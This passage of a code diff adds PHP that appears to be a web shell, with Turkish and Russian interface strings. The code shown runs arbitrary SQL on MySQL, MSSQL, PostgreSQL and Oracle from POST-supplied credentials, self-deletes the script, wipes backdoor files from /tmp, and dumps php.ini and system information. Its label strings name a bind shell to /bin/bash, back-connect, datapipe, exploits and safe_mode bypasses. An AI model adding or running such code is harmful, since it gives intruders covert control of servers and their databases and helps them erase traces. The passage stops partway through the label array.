+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>MsSQL Server ile baglanti kurulamadi</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>MSSQL server ile baglanti Kurulamadi</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>PostgreSQL server ile baglanti kurulamadi</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b> Oracle server ile baglanti kurulamadi<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" SQL Sorgusu Iste \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+   die();
+ }
+/*
+&#1042;&#1099;&#1073;&#1086;&#1088; &#1103;&#1079;&#1099;&#1082;&#1072;
+$language='eng' - &#1088;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081;
+$language='ru' - &#1072;&#1085;&#1075;&#1083;&#1080;&#1081;&#1089;&#1082;&#1080;&#1081;
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1085;&#1072;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text2' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+'ru_text3' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1091;',
+'ru_text4' =>'&#1056;&#1072;&#1073;&#1086;&#1095;&#1072;&#1103; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103;',
+'ru_text5' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;',
+'ru_text6' =>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text7' =>'&#1040;&#1083;&#1080;&#1072;&#1089;&#1099;',
+'ru_text8' =>'&#1042;&#1099;&#1073;&#1077;&#1088;&#1080;&#1090;&#1077; &#1072;&#1083;&#1080;&#1072;&#1089;',
+'ru_butt1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;',
+'ru_butt2' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1080;&#1090;&#1100;',
+'ru_text9' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1080;&#1077; &#1087;&#1086;&#1088;&#1090;&#1072; &#1080; &#1087;&#1088;&#1080;&#1074;&#1103;&#1079;&#1082;&#1072; &#1077;&#1075;&#1086; &#1082; /bin/bash',
+'ru_text10'=>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100; &#1087;&#1086;&#1088;&#1090;',
+'ru_text11'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072;',
+'ru_butt3' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100;',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-&#1072;&#1076;&#1088;&#1077;&#1089;',
+'ru_text14'=>'&#1055;&#1086;&#1088;&#1090;',
+'ru_butt4' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;',
+'ru_text15'=>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1089; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1086;&#1075;&#1086; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;',
+'ru_text16'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text17'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text18'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text21'=>'&#1053;&#1086;&#1074;&#1086;&#1077; &#1080;&#1084;&#1103;',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;',
+'ru_text24'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1093;&#1086;&#1089;&#1090;',
+'ru_text25'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;',
+'ru_text26'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_butt5' =>'&#1047;&#1072;&#1087;&#1091;&#1089;&#1090;&#1080;&#1090;&#1100;',
+'ru_text28'=>'&#1056;&#1072;&#1073;&#1086;&#1090;&#1072; &#1074; safe_mode',
+'ru_text29'=>'&#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1079;&#1072;&#1087;&#1088;&#1077;&#1097;&#1077;&#1085;',
+'ru_butt6' =>'&#1057;&#1084;&#1077;&#1085;&#1080;&#1090;&#1100;',
+'ru_text30'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1092;&#1072;&#1081;&#1083;&#1072;',
+'ru_butt7' =>'&#1042;&#1099;&#1074;&#1077;&#1089;&#1090;&#1080;',
+'ru_text31'=>'&#1060;&#1072;&#1081;&#1083; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;',
+'ru_text32'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; PHP &#1082;&#1086;&#1076;&#1072;',
+'ru_text33'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; open_basedir &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1080; cURL',
+'ru_butt8' =>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1080;&#1090;&#1100;',
+'ru_text34'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1102; include',
+'ru_text35'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1079;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1091; &#1092;&#1072;&#1081;&#1083;&#1072; &#1074; mysql',
+'ru_text36'=>'&#1041;&#1072;&#1079;&#1072;',
+'ru_text37'=>'&#1051;&#1086;&#1075;&#1080;&#1085;',
+'ru_text38'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100;',
+'ru_text39'=>'&#1058;&#1072;&#1073;&#1083;&#1080;&#1094;&#1072;',
+'ru_text40'=>'&#1044;&#1072;&#1084;&#1087; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_butt9' =>'&#1044;&#1072;&#1084;&#1087;',
+'ru_text41'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1077;',
+'ru_text42'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072;',
+'ru_text43'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083;',
+'ru_butt10'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100;',
+'ru_butt11'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text44'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072; &#1085;&#1077;&#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;! &#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1076;&#1083;&#1103; &#1095;&#1090;&#1077;&#1085;&#1080;&#1103;!',
+'ru_text45'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1093;&#1088;&#1072;&#1085;&#1077;&#1085;',
+'ru_text46'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; phpinfo()',
+'ru_text47'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1085;&#1072;&#1089;&#1090;&#1088;&#1086;&#1077;&#1082; php.ini',
+'ru_text48'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1074;&#1088;&#1077;&#1084;&#1077;&#1085;&#1085;&#1099;&#1093; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074;',
+'ru_text49'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1072; &#1089; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;',
+'ru_text50'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089;&#1086;&#1088;&#1077;',
+'ru_text51'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1072;&#1084;&#1103;&#1090;&#1080;',
+'ru_text52'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;',
+'ru_text53'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;',
+'ru_text54'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_butt12'=>'&#1053;&#1072;&#1081;&#1090;&#1080;',
+'ru_text55'=>'&#1058;&#1086;&#1083;&#1100;&#1082;&#1086; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_text56'=>'&#1053;&#1080;&#1095;&#1077;&#1075;&#1086; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;&#1086;',
+'ru_text57'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100; &#1060;&#1072;&#1081;&#1083;/&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;',
+'ru_text58'=>'&#1048;&#1084;&#1103;',
+'ru_text59'=>'&#1060;&#1072;&#1081;&#1083;',
+'ru_text60'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;',
+'ru_butt13'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;',
+'ru_text61'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;',
+'ru_text62'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;&#1072;',
+'ru_text63'=>'&#1060;&#1072;&#1081;&#1083; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;',
+'ru_text64'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1072;',
+'ru_text65'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;',
+'ru_text66'=>'&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'&#1050;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text69'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;1',
+'ru_text70'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;2',
+'ru_text71'=>"&#1042;&#1090;&#1086;&#1088;&#1086;&#1081; &#1087;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;:\r\n- &#1076;&#1083;&#1103; CHOWN - &#1080;&#1084;&#1103; &#1085;&#1086;&#1074;&#1086;&#1075;&#1086; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; &#1080;&#1083;&#1080; &#1077;&#1075;&#1086; UID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHGRP - &#1080;&#1084;&#1103; &#1075;&#1088;&#1091;&#1087;&#1087;&#1099; &#1080;&#1083;&#1080; GID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHMOD - &#1094;&#1077;&#1083;&#1086;&#1077; &#1095;&#1080;&#1089;&#1083;&#1086; &#1074; &#1074;&#1086;&#1089;&#1100;&#1084;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086;&#1084; &#1087;&#1088;&#1077;&#1076;&#1089;&#1090;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1080; (&#1085;&#1072;&#1087;&#1088;&#1080;&#1084;&#1077;&#1088; 0777)",
+'ru_text72'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;',
+'ru_text73'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;',
+'ru_text74'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_text75'=>'* &#1084;&#1086;&#1078;&#1085;&#1086; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100; &#1088;&#1077;&#1075;&#1091;&#1083;&#1103;&#1088;&#1085;&#1086;&#1077; &#1074;&#1099;&#1088;&#1072;&#1078;&#1077;&#1085;&#1080;&#1077;',
+'ru_text76'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093; &#1089; &#1087;&#1086;&#1084;&#1086;&#1097;&#1100;&#1102; &#1091;&#1090;&#1080;&#1083;&#1080;&#1090;&#1099; find',
+'ru_text77'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1089;&#1090;&#1088;&#1091;&#1082;&#1090;&#1091;&#1088;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_text78'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099;',
+'ru_text79'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1089;&#1090;&#1086;&#1083;&#1073;&#1094;&#1099;',
+'ru_text80'=>'&#1058;&#1080;&#1087;',
+'ru_text81'=>'&#1057;&#1077;&#1090;&#1100;',
+'ru_text82'=>'&#1041;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_text83'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072;',
+'ru_text84'=>'SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;',
